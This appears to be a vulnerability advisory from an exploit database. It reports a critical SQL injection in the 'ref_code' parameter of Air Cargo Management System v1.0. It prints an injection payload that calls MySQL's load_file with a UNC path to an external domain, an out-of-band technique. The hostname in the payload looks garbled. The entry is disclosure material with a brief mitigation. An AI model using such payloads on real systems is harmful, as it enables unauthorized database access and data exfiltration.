vendor:
Air Cargo Management System
by:
nu11secur1ty
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Air Cargo Management System
Affected Version From: Air Cargo Management System v1.0
Affected Version To: Air Cargo Management System v1.0
Patch Exists:
Related CWE:
CPE:
Platforms Tested:
2022
Air Cargo Management System v1.0 – SQLi
The `ref_code` parameter from Air Cargo Management System v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.htmlhag'))+' was submitted in the ref_code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks.